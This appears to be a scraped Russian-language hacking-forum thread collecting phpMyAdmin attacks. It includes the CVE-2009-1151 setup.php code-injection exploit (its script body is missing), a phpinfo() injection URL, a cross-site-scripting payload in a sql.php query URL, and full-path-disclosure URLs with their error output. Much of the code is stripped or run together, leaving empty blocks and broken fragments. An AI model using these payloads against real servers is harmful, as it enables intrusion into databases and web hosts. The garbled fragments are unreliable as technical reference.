![]() |
Код:
calendar.php?GLOBALS |
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash |
CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4
Код:
<?phpphpMyAdmin//config/config.inc.php?p=phpinfo(); Vulnerable software and versions: phpmyadmin:3.1.3 phpmyadmin:3.1.3:rc1 phpmyadmin:3.1.2 phpmyadmin:3.1.2:rc1 phpmyadmin:3.1.1 phpmyadmin:3.1.1:rc1 phpmyadmin:3.1.0 phpmyadmin:2.11.9.3 phpmyadmin:2.11.9.4 phpmyadmin:2.11.9.2 phpmyadmin:2.11.9.1 phpmyadmin:2.11.9.0 phpmyadmin:2.11.9 phpmyadmin:2.11.8 phpmyadmin:2.11.7.12.11.7.1 phpmyadmin:2.11.7.0 phpmyadmin:2.11.7 phpmyadmin:2.11.6:rc1 phpmyadmin:2.11.6.0 phpmyadmin:2.11.6 phpmyadmin:2.11.5:rc1 phpmyadmin:2.11.5.2 phpmyadmin:2.11.5.1 phpmyadmin:2.11.5.0 phpmyadmin:2.11.5 phpmyadmin:2.11.4:rc1 phpmyadmin:2.11.4 phpmyadmin:2.11.3:rc1 phpmyadmin:2.11.3.0 phpmyadmin:2.11.3 phpmyadmin:2.11.2.2 phpmyadmin:2.11.2.1 phpmyadmin:2.11.2.0 phpmyadmin:2.11.2 phpmyadmin:2.11.1:rc1 phpmyadmin:2.11.1.2 phpmyadmin:2.11.1.1 phpmyadmin:2.11.1.0 phpmyadmin:2.11.1 phpmyadmin:2.11.0:rc1 phpmyadmin:2.11.0:beta1 phpmyadmin:2.11.0 |
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют |
Files locations
Код:
/php-my-admin/ |
По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были ( |
Цитата:
PHP код:
|
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Код:
Bugtraq ID: 35543 Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E |
как узнать точную версию phpMyAdmin
|
Раскрытие путей
phpMyAdmin 2.6.1 Код:
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='Код:
Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\lPHP код:
Код:
http://localhost/Tools/phpMyAdmin/footer.inc.phpКод:
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17PHP код:
Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.phpКод:
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385PHP код:
(C)Xcontrol212 |
| Время: 10:31 |